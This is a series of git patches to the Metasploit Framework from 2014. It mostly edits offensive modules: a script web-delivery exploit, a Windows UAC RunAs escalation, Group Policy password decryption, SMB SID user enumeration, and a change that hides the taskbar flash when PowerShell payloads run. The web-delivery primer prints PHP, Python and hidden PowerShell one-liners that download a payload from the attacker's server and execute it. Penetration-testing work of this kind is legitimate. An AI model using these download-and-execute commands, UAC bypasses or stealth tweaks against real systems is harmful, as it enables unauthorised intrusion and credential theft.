---
 modules/exploits/multi/script/web_delivery.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb
index 7f8f731d91..85eeb5df68 100644
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -4,10 +4,12 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
 
+  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})

From 5a2512066050a6e85eaf6af7894da465b76c5e90 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 31 Jul 2014 16:16:23 -0400
Subject: [PATCH 207/321] Apply rubocop changes to multi/script/web_delivery

---
 modules/exploits/multi/script/web_delivery.rb | 48 +++++++++----------
 1 file changed, 24 insertions(+), 24 deletions(-)

diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb
index 85eeb5df68..acd58604c6 100644
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(info,
       'Name'         => 'Script Web Delivery',
-      'Description'  => %q{
+      'Description'  => %q(
         This module quickly fires up a web server that serves a payload.
         The provided command will start the specified scripting language interpreter and then download and execute the
         payload. The main purpose of this module is to quickly establish a session on a target
@@ -25,13 +25,13 @@ class Metasploit3 < Msf::Exploit::Remote
         escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
         payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
         x86 payloads on x64 machines.
-      },
+      ),
       'License'      => MSF_LICENSE,
       'Author'       =>
         [
           'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
           'Ben Campbell',
-          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
+          'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
         ],
       'DefaultOptions' =>
         {
@@ -39,12 +39,12 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'References'     =>
         [
-          [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
-          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
-          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
+          ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+          ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
+          ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
         ],
-      'Platform'       => %w{python php win},
+      'Platform'       => %w(python php win),
       'Targets'        =>
         [
           ['Python', {
@@ -62,38 +62,38 @@ class Metasploit3 < Msf::Exploit::Remote
           ['PSH_x64', {
             'Platform' => 'win',
             'Arch' => ARCH_X86_64
-          }],
+          }]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 19 2013'
     ))
   end
 
-  def on_request_uri(cli, request)
-    print_status("Delivering Payload")
-    if (target.name.include? "PSH")
+  def on_request_uri(cli, _request)
+    print_status('Delivering Payload')
+    if target.name.include? 'PSH'
       data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
     else
-      data = %Q|#{payload.encoded} |
+      data = %Q(#{payload.encoded} )
     end
-    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+    send_response(cli, data,  'Content-Type' => 'application/octet-stream')
   end
 
   def primer
-    url = get_uri()
-    print_status("Run the following command on the target machine:")
+    url = get_uri
+    print_status('Run the following command on the target machine:')
     case target.name
-    when "PHP"
+    when 'PHP'
       print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
-    when "Python"
+    when 'Python'
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
-    when "PSH_x86", "PSH_x64"
+    when 'PSH_x86', 'PSH_x64'
       download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-      print_line generate_psh_command_line({
-                                     :noprofile => true,
-                                     :windowstyle => 'hidden',
-                                     :command => download_and_run
-                                 })
+      print_line generate_psh_command_line(
+                                             noprofile: true,
+                                             windowstyle: 'hidden',
+                                             command: download_and_run
+                                           )
     end
   end
 end

From bff8a734aed499ac55cbd35501fa65c40c907fcb Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Thu, 31 Jul 2014 22:58:43 +0100
Subject: [PATCH 208/321] Fix and be Architecture Agnostic

---
 modules/exploits/multi/script/web_delivery.rb | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb
index acd58604c6..ec3d857e16 100644
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -55,13 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote
             'Platform' => 'php',
             'Arch' => ARCH_PHP
           }],
-          ['PSH_x86', {
+          ['PSH', {
             'Platform' => 'win',
-            'Arch' => ARCH_X86
-          }],
-          ['PSH_x64', {
-            'Platform' => 'win',
-            'Arch' => ARCH_X86_64
+            'Arch' => [ARCH_X86, ARCH_X86_64]
           }]
         ],
       'DefaultTarget'  => 0,
@@ -72,7 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_uri(cli, _request)
     print_status('Delivering Payload')
     if target.name.include? 'PSH'
-      data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+      data = cmd_psh_payload(payload.encoded,
+                             payload_instance.arch.first,
+                             remove_comspec: true,
+                             use_single_quotes: true
+                           )
     else
       data = %Q(#{payload.encoded} )
     end
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
     when 'Python'
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
-    when 'PSH_x86', 'PSH_x64'
+    when 'PSH'
       download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
       print_line generate_psh_command_line(
                                              noprofile: true,

From 15c1ab64cd0f60f743e05c5be59a538ae6f64dfb Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Thu, 31 Jul 2014 23:07:17 +0100
Subject: [PATCH 209/321] Quick rubocop

---
 lib/msf/core/post/windows/runas.rb    |  8 ++---
 modules/exploits/windows/local/ask.rb | 47 +++++++++++++--------------
 2 files changed, 25 insertions(+), 30 deletions(-)

diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
index 1c29b19e26..3995379f50 100644
--- a/lib/msf/core/post/windows/runas.rb
+++ b/lib/msf/core/post/windows/runas.rb
@@ -4,13 +4,12 @@ require 'msf/core/exploit/powershell'
 require 'msf/core/exploit/exe'
 
 module Msf::Post::Windows::Runas
-
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Exploit::Powershell
 
-  def execute_exe(filename=nil, path=nil, upload=nil)
-    payload_filename = filename || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+  def execute_exe(filename = nil, path = nil, upload = nil)
+    payload_filename = filename || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
     payload_path = path || get_env('TEMP')
     cmd_location = "#{payload_path}\\#{payload_filename}"
 
@@ -33,8 +32,7 @@ module Msf::Post::Windows::Runas
   end
 
   def shell_exec(command, args)
-    print_status("Executing elevated command...")
+    print_status('Executing elevated command...')
     session.railgun.shell32.ShellExecuteA(nil, 'runas', command, args, nil, 'SW_SHOW')
   end
 end
-
diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
index f8ddd4f4f8..e3c2a9eba0 100644
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -11,61 +11,58 @@ class Metasploit3 < Msf::Exploit::Local
   include Post::Windows::Priv
   include Post::Windows::Runas
 
-  def initialize(info={})
-    super( update_info( info,
+  def initialize(info = {})
+    super(update_info(info,
       'Name'          => 'Windows Escalate UAC Execute RunAs',
-      'Description'   => %q{
+      'Description'   => %q(
         This module will attempt to elevate execution level using
         the ShellExecute undocumented RunAs flag to bypass low
         UAC settings.
-      },
+      ),
       'License'       => MSF_LICENSE,
       'Author'        => [
-          'mubix', # Original technique
-          'b00stfr3ak' # Added powershell option
+        'mubix', # Original technique
+        'b00stfr3ak' # Added powershell option
       ],
-      'Platform'      => [ 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ],
-      'Targets'       => [ [ 'Windows', {} ] ],
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [['Windows', {}]],
       'DefaultTarget' => 0,
       'References'    => [
-        [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
+        ['URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html']
       ],
-      'DisclosureDate'=> "Jan 3 2012"
+      'DisclosureDate' => 'Jan 3 2012'
     ))
 
     register_options([
-      OptString.new("FILENAME", [ false, "File name on disk"]),
-      OptString.new("PATH", [ false, "Location on disk, %TEMP% used if not set" ]),
-      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
-      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
+      OptString.new('FILENAME', [false, 'File name on disk']),
+      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
+      OptBool.new('UPLOAD', [true, 'Should the payload be uploaded?', true]),
+      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),
     ])
-
   end
 
   def exploit
-
     if is_uac_enabled?
-      print_status "UAC is Enabled, checking level..."
+      print_status 'UAC is Enabled, checking level...'
       case get_uac_level
       when UAC_NO_PROMPT
-        print_good "UAC is not enabled, no prompt for the user"
+        print_good 'UAC is not enabled, no prompt for the user'
       else
         print_status "The user will be prompted, wait for them to click 'Ok'"
       end
     else
-      print_good "UAC is not enabled, no prompt for the user"
+      print_good 'UAC is not enabled, no prompt for the user'
     end
 
     #
     # Generate payload and random names for upload
     #
-    case datastore["TECHNIQUE"]
-    when "EXE"
-      execute_exe(datastore["FILENAME"], datastore["PATH"], datastore["UPLOAD"])
-    when "PSH"
+    case datastore['TECHNIQUE']
+    when 'EXE'
+      execute_exe(datastore['FILENAME'], datastore['PATH'], datastore['UPLOAD'])
+    when 'PSH'
       execute_psh
     end
   end
 end
-

From 90c0f587bfb9086cfb34b559bed1d693bf319e0b Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Thu, 31 Jul 2014 23:11:51 +0100
Subject: [PATCH 210/321] Fix for newer powershell

---
 lib/msf/core/post/windows/runas.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
index 3995379f50..3ba00c672f 100644
--- a/lib/msf/core/post/windows/runas.rb
+++ b/lib/msf/core/post/windows/runas.rb
@@ -25,7 +25,7 @@ module Msf::Post::Windows::Runas
   end
 
   def execute_psh
-    powershell_command = cmd_psh_payload(payload.encoded)
+    powershell_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
     command = 'cmd.exe'
     args = "/c #{powershell_command}"
     shell_exec(command, args)

From 902cf4bc1e8b6ef45bbe267495c1c6c60849fd8f Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Thu, 31 Jul 2014 23:16:53 +0100
Subject: [PATCH 211/321] Fix var name

---
 lib/msf/core/post/windows/runas.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
index 3ba00c672f..663da8e431 100644
--- a/lib/msf/core/post/windows/runas.rb
+++ b/lib/msf/core/post/windows/runas.rb
@@ -21,7 +21,7 @@ module Msf::Post::Windows::Runas
       print_status("No file uploaded, attempting to execute #{cmd_location}...")
     end
 
-    shell_exec(command_location, nil)
+    shell_exec(cmd_location, nil)
   end
 
   def execute_psh

From 1fb4216d6dc336a6d07c93ea6a9a0339fa5ab955 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 1 Aug 2014 12:08:03 +0100
Subject: [PATCH 212/321] Update spec

---
 spec/lib/rex/parser/group_policy_preferences_spec.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/spec/lib/rex/parser/group_policy_preferences_spec.rb b/spec/lib/rex/parser/group_policy_preferences_spec.rb
index fd8401ab1c..fe6f7979eb 100644
--- a/spec/lib/rex/parser/group_policy_preferences_spec.rb
+++ b/spec/lib/rex/parser/group_policy_preferences_spec.rb
@@ -1,3 +1,4 @@
+# encoding: binary
 require 'rex/parser/group_policy_preferences'
 
 xml_group = '
@@ -76,6 +77,7 @@ xml_ms = '
 </Groups>
 '
 
+cpassword_utf7 = 'EqWFlA4kn2T6PHvGi09M7seHuqCYK/slkJWIl7mK+wFSuDccBEp/4l5EuKnwF0WS•ªH~AA'
 cpassword_normal = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
 cpassword_bad = "blah"
 
@@ -85,7 +87,7 @@ describe Rex::Parser::GPP do
 	##
 	# Decrypt
 	##
-	it "Decrypt returns Local*P4ssword! for normal cpassword" do 
+	it "Decrypt returns Local*P4ssword! for normal cpassword" do
 		result = GPP.decrypt(cpassword_normal) 
 		result.should eq("Local*P4ssword!")
 	end
@@ -95,11 +97,16 @@ describe Rex::Parser::GPP do
 		result.should eq("")
 	end
 	
-	it "Decrypt returns blank for nil cpassword" do 
+	it "Decrypt returns blank for nil cpassword" do
 		result = GPP.decrypt(nil)
 		result.should eq("")
 	end
 
+  it 'Decrypts a cpassword containing UTF7' do
+    result = GPP.decrypt(cpassword_utf7)
+    result.should eq('N3v3rGunnaG!veYouUp')
+  end
+
 	##
 	# Parse
 	##

From 4ef3de84f3fc1c94a23aadc735acb014561a90f1 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 1 Aug 2014 14:34:17 +0100
Subject: [PATCH 213/321] get some more test cases

---
 lib/rex/parser/group_policy_preferences.rb    | 38 ++++++++++++++++---
 .../parser/group_policy_preferences_spec.rb   | 16 ++++++--
 2 files changed, 44 insertions(+), 10 deletions(-)

diff --git a/lib/rex/parser/group_policy_preferences.rb b/lib/rex/parser/group_policy_preferences.rb
index a8fb69ce1d..3e97450b28 100644
--- a/lib/rex/parser/group_policy_preferences.rb
+++ b/lib/rex/parser/group_policy_preferences.rb
@@ -129,14 +129,40 @@ class GPP
   # Decrypts passwords using Microsoft's published key:
   # http://msdn.microsoft.com/en-us/library/cc422924.aspx
   def self.decrypt(encrypted_data)
-    unless encrypted_data
-      return ""
-    end
+    password = ""
+    return password unless encrypted_data
 
     password = ""
-    padding = "=" * (4 - (encrypted_data.length % 4))
-    epassword = "#{encrypted_data}#{padding}"
-    decoded = Rex::Text.decode_base64(epassword)
+    retries = 0
+    original_data = encrypted_data.dup
+
+    begin
+      mod = encrypted_data.length % 4
+
+      # PowerSploit code strips the last character, unsure why...
+      case mod
+      when 1
+        encrypted_data = encrypted_data[0..-2]
+      when 2, 3
+        padding = '=' * (4 - mod)
+        encrypted_data = "#{encrypted_data}#{padding}"
+      end
+
+      # Strict base64 decoding used here
+      decoded = encrypted_data.unpack('m0').first
+    rescue ::ArgumentError => e
+      # Appears to be some junk UTF-8 Padding appended at times in
+      # Win2k8 (not in Win2k8R2)
+      # Lets try stripping junk and see if we can decrypt
+      if retries < 8
+        retries += 1
+        original_data = original_data[0..-2]
+        encrypted_data = original_data
+        retry
+      else
+        return password
+      end
+    end
 
     key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
     aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
diff --git a/spec/lib/rex/parser/group_policy_preferences_spec.rb b/spec/lib/rex/parser/group_policy_preferences_spec.rb
index fe6f7979eb..54b284a1b0 100644
--- a/spec/lib/rex/parser/group_policy_preferences_spec.rb
+++ b/spec/lib/rex/parser/group_policy_preferences_spec.rb
@@ -77,7 +77,13 @@ xml_ms = '
 </Groups>
 '
 
-cpassword_utf7 = 'EqWFlA4kn2T6PHvGi09M7seHuqCYK/slkJWIl7mK+wFSuDccBEp/4l5EuKnwF0WS•ªH~AA'
+# Win2k8 appears to append some junk padding in some cases
+cpassword_win2k8 = []
+# Win2k8R2 -          EqWFlA4kn2T6PHvGi09M7seHuqCYK/slkJWIl7mK+wEMON8tIIslS6707RU1F7Bh
+cpassword_win2k8 << ['EqWFlA4kn2T6PHvGi09M7seHuqCYK/slkJWIl7mK+wEMON8tIIslS6707RU1F7BhTµkp', 'N3v3rGunnaG!veYo']
+cpassword_win2k8 << ['EqWFlA4kn2T6PHvGi09M7seHuqCYK/slkJWIl7mK+wGSwOI7Be//GJdxd5YYXUQHTµkp', 'N3v3rGunnaG!veYou']
+# Win2k8R2 -          EqWFlA4kn2T6PHvGi09M7seHuqCYK/slkJWIl7mK+wFSuDccBEp/4l5EuKnwF0WS
+cpassword_win2k8 << ['EqWFlA4kn2T6PHvGi09M7seHuqCYK/slkJWIl7mK+wFSuDccBEp/4l5EuKnwF0WS»YÂVAA', 'N3v3rGunnaG!veYouUp']
 cpassword_normal = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
 cpassword_bad = "blah"
 
@@ -102,9 +108,11 @@ describe Rex::Parser::GPP do
 		result.should eq("")
 	end
 
-  it 'Decrypts a cpassword containing UTF7' do
-    result = GPP.decrypt(cpassword_utf7)
-    result.should eq('N3v3rGunnaG!veYouUp')
+  it 'Decrypts a cpassword containing junk padding' do
+    cpassword_win2k8.each do |encrypted, expected|
+      result = GPP.decrypt(encrypted)
+      result.should eq(expected)
+    end
   end
 
 	##

From b4111df3815e54e0cbab13f2202f96524a9da005 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 1 Aug 2014 14:41:20 +0100
Subject: [PATCH 214/321] Retab spec

---
 .../parser/group_policy_preferences_spec.rb   | 118 +++++++++---------
 1 file changed, 59 insertions(+), 59 deletions(-)

diff --git a/spec/lib/rex/parser/group_policy_preferences_spec.rb b/spec/lib/rex/parser/group_policy_preferences_spec.rb
index 54b284a1b0..3d0f8c03d4 100644
--- a/spec/lib/rex/parser/group_policy_preferences_spec.rb
+++ b/spec/lib/rex/parser/group_policy_preferences_spec.rb
@@ -88,25 +88,25 @@ cpassword_normal = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
 cpassword_bad = "blah"
 
 describe Rex::Parser::GPP do
-	GPP = Rex::Parser::GPP
-	
-	##
-	# Decrypt
-	##
-	it "Decrypt returns Local*P4ssword! for normal cpassword" do
-		result = GPP.decrypt(cpassword_normal) 
-		result.should eq("Local*P4ssword!")
-	end
+  GPP = Rex::Parser::GPP
+  
+  ##
+  # Decrypt
+  ##
+  it "Decrypt returns Local*P4ssword! for normal cpassword" do
+    result = GPP.decrypt(cpassword_normal) 
+    result.should eq("Local*P4ssword!")
+  end
 
-	it "Decrypt returns blank for bad cpassword" do
-		result = GPP.decrypt(cpassword_bad)
-		result.should eq("")
-	end
-	
-	it "Decrypt returns blank for nil cpassword" do
-		result = GPP.decrypt(nil)
-		result.should eq("")
-	end
+  it "Decrypt returns blank for bad cpassword" do
+    result = GPP.decrypt(cpassword_bad)
+    result.should eq("")
+  end
+  
+  it "Decrypt returns blank for nil cpassword" do
+    result = GPP.decrypt(nil)
+    result.should eq("")
+  end
 
   it 'Decrypts a cpassword containing junk padding' do
     cpassword_win2k8.each do |encrypted, expected|
@@ -115,51 +115,51 @@ describe Rex::Parser::GPP do
     end
   end
 
-	##
-	# Parse
-	##
+  ##
+  # Parse
+  ##
 
-	it "Parse returns empty [] for nil" do
-		GPP.parse(nil).should be_empty
-	end
+  it "Parse returns empty [] for nil" do
+    GPP.parse(nil).should be_empty
+  end
 
-	it "Parse returns results for xml_ms and password is empty" do
-		results = GPP.parse(xml_ms)
-		results.should_not be_empty
-		results[0][:PASS].should be_empty
-	end
+  it "Parse returns results for xml_ms and password is empty" do
+    results = GPP.parse(xml_ms)
+    results.should_not be_empty
+    results[0][:PASS].should be_empty
+  end
 
-	it "Parse returns results for xml_datasrc, and attributes, and password is test1" do
-		results = GPP.parse(xml_datasrc)
-		results.should_not be_empty
-		results[0].include?(:ATTRIBUTES).should be_true
-		results[0][:ATTRIBUTES].should_not be_empty
-		results[0][:PASS].should eq("test")
-	end
+  it "Parse returns results for xml_datasrc, and attributes, and password is test1" do
+    results = GPP.parse(xml_datasrc)
+    results.should_not be_empty
+    results[0].include?(:ATTRIBUTES).should be_true
+    results[0][:ATTRIBUTES].should_not be_empty
+    results[0][:PASS].should eq("test")
+  end
 
-	xmls = []
-	xmls << xml_group
-	xmls << xml_drive
-	xmls << xml_schd
-	xmls << xml_serv
-	xmls << xml_datasrc
+  xmls = []
+  xmls << xml_group
+  xmls << xml_drive
+  xmls << xml_schd
+  xmls << xml_serv
+  xmls << xml_datasrc
 
-	it "Parse returns results for all good xmls and passwords" do
-		xmls.each do |xml|
-			results = GPP.parse(xml)
-			results.should_not be_empty
-			results[0][:PASS].should_not be_empty
-		end
-	end
+  it "Parse returns results for all good xmls and passwords" do
+    xmls.each do |xml|
+      results = GPP.parse(xml)
+      results.should_not be_empty
+      results[0][:PASS].should_not be_empty
+    end
+  end
 
-	##
-	# Create_Tables
-	##
-	it "Create_tables returns tables for all good xmls" do
-		xmls.each do |xml|
-			results = GPP.parse(xml)
-			tables = GPP.create_tables(results, "test")
-			tables.should_not be_empty
-		end
-	end
+  ##
+  # Create_Tables
+  ##
+  it "Create_tables returns tables for all good xmls" do
+    xmls.each do |xml|
+      results = GPP.parse(xml)
+      tables = GPP.create_tables(results, "test")
+      tables.should_not be_empty
+    end
+  end
 end

From 3bc8d1fee9727bee7aef1d7f18d0017d4808248c Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 2 Aug 2014 14:25:17 -0500
Subject: [PATCH 215/321] See #RM8838. Handle null domain_sid properly

This switches to the local sid if the domain sid is null, even if
the ACTION is set to DOMAIN. This solves the issue identified in

```
[*] 192.168.0.4 PIPE(LSARPC) LOCAL(NAS - 5-21-2272853860-1115691317-1341221697) DOMAIN(WORKGROUP - )
[-] 192.168.0.4 No domain SID identified, falling back to the local SID...
[*] 192.168.0.4 USER=guest RID=501
[*] 192.168.0.4 GROUP=None RID=513
```
---
 .../auxiliary/scanner/smb/smb_lookupsid.rb    | 33 +++++++++++--------
 1 file changed, 20 insertions(+), 13 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb
index 99df43964d..d5798516d5 100644
--- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb
+++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'SMB Local User Enumeration (LookupSid)',
+      'Name'        => 'SMB SID User Enumeration (LookupSid)',
       'Description' => 'Determine what users exist via brute force SID lookups.
         This module can enumerate both local and domain accounts by setting
         ACTION to either LOCAL or DOMAIN',
@@ -29,6 +29,8 @@ class Metasploit3 < Msf::Auxiliary
       'License'     => MSF_LICENSE,
       'DefaultOptions' =>
         {
+          # Samba doesn't like this option, so we disable so we are compatible with
+          # both Windows and Samba for enumeration.
           'DCERPC::fake_bind_multi' => false
         },
       'Actions'     =>
@@ -49,6 +51,10 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('RPORT', 'RHOST')
   end
 
+  # Constants used by this module
+  LSA_UUID     = '12345778-1234-abcd-ef00-0123456789ab'
+  LSA_VERS     = '0.0'
+  LSA_PIPES    = %W{ LSARPC NETLOGON SAMR BROWSER SRVSVC }
 
   # Locate an available SMB PIPE for the specified service
   def smb_find_dcerpc_pipe(uuid, vers, pipes)
@@ -128,11 +134,6 @@ class Metasploit3 < Msf::Auxiliary
     [ uinfo[3], name ]
   end
 
-
-  @@lsa_uuid     = '12345778-1234-abcd-ef00-0123456789ab'
-  @@lsa_vers     = '0.0'
-  @@lsa_pipes    = %W{ LSARPC NETLOGON SAMR BROWSER SRVSVC }
-
   # Fingerprint a single host
   def run_host(ip)
 
@@ -145,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary
     lsa_handle = nil
     begin
       # find the lsarpc pipe
-      lsa_pipe = smb_find_dcerpc_pipe(@@lsa_uuid, @@lsa_vers, @@lsa_pipes)
+      lsa_pipe = smb_find_dcerpc_pipe(LSA_UUID, LSA_VERS, LSA_PIPES)
       break if not lsa_pipe
 
       # OpenPolicy2()
@@ -201,11 +202,9 @@ class Metasploit3 < Msf::Auxiliary
       resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
       domain_sid, domain_name = smb_parse_sid(resp)
 
-
       # Store SID, local domain name, joined domain name
       print_status("#{ip} PIPE(#{lsa_pipe}) LOCAL(#{host_name} - #{host_sid}) DOMAIN(#{domain_name} - #{domain_sid})")
 
-
       domain = {
         :name    => host_name,
         :txt_sid => host_sid,
@@ -213,8 +212,17 @@ class Metasploit3 < Msf::Auxiliary
         :groups  => {}
       }
 
-      target_sid = host_sid if action.name =~ /LOCAL/i
-      target_sid = domain_sid if action.name =~ /DOMAIN/i
+      target_sid = case action.name.upcase
+      when 'LOCAL'
+        host_sid
+      when 'DOMAIN'
+        # Fallthrough to the host SID if no domain SID was returned
+        unless domain_sid
+          print_error("#{ip} No domain SID identified, falling back to the local SID...")
+        end
+        domain_sid || host_sid
+      end
+
       # Brute force through a common RID range
       500.upto(datastore['MaxRID'].to_i) do |rid|
 
@@ -269,10 +277,9 @@ class Metasploit3 < Msf::Auxiliary
       )
 
       print_status("#{ip} #{domain[:name].upcase} [#{domain[:users].keys.map{|k| domain[:users][k]}.join(", ")} ]")
-
-      # cleanup
       disconnect
       return
+
     rescue ::Timeout::Error
     rescue ::Interrupt
       raise $!

From 693e744da4b42cac774025e408d6fa953039fcdd Mon Sep 17 00:00:00 2001
From: Tom Sellers <tom@fadedcode.net>
Date: Sat, 2 Aug 2014 15:52:52 -0500
Subject: [PATCH 216/321] Hide icon flash on taskbar during cmd_psh_payload

When 'cmd_psh_payload' is run via 'cmd_exec' on a windows shell that is running in the context of an interactive user an icon will flash very quickly on the user's task bar.  This can be avoided (verified) by adding the /b switch to the start section of the command launcher text.  I have verified that this switch exists from Windows 2000 through Windows 2012 R2.
---
 lib/msf/core/exploit/powershell.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index c45e002274..b99abc4859 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -359,7 +359,7 @@ EOS
     if opts[:remove_comspec]
       command = psh_command
     else
-      command = "%COMSPEC% /b /c start /min #{psh_command}"
+      command = "%COMSPEC% /b /c start /b /min #{psh_command}"
     end
 
     vprint_status("Powershell command length: #{command.length}")

From 8cca4d7795734969f72d8914a03c32d6061838db Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sun, 3 Aug 2014 13:38:15 -0500
Subject: [PATCH 217/321] Fix the makefile to use the right directory

Reported by severos on IRC, the current output
class is in the right place, but the makefile
was broken.
---
 external/source/exploits/CVE-2013-2465/Makefile | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/external/source/exploits/CVE-2013-2465/Makefile b/external/source/exploits/CVE-2013-2465/Makefile
index 4ee5294f12..1c9f5711e3 100644
--- a/external/source/exploits/CVE-2013-2465/Makefile
+++ b/external/source/exploits/CVE-2013-2465/Makefile
@@ -7,7 +7,7 @@ CLASSES = Exploit.java
 all: $(CLASSES:.java=.class)
 
 install:
-	mv *.class ../../../../data/exploits/CVE-2013-3465/
+	mv *.class ../../../../data/exploits/CVE-2013-2465/
 
 clean:
 	rm -rf *.class

From 2805af2a047ff3c656fb0f0c5bd519ca93e6c751 Mon Sep 17 00:00:00 2001
From: Victor <nakilon@gmail.com>
Date: Mon, 4 Aug 2014 04:11:49 +0400
Subject: [PATCH 218/321] `\t` error msgs bug and some codestyle tweaks

Minor bugs: `\t` were used inside single quoted strings.
Tweak: `a, b = c` is the same as `a = c[0]; b = [1] if c.length > 1`.
Minor tweak: `qwe if rty` form instead of multiline when `qwe` is only one line long.
Minor tweak: thanks to `#{}` interpolation we can omit `.to_s`.
---
 plugins/sqlmap.rb | 41 +++++++++++++++++------------------------
 1 file changed, 17 insertions(+), 24 deletions(-)

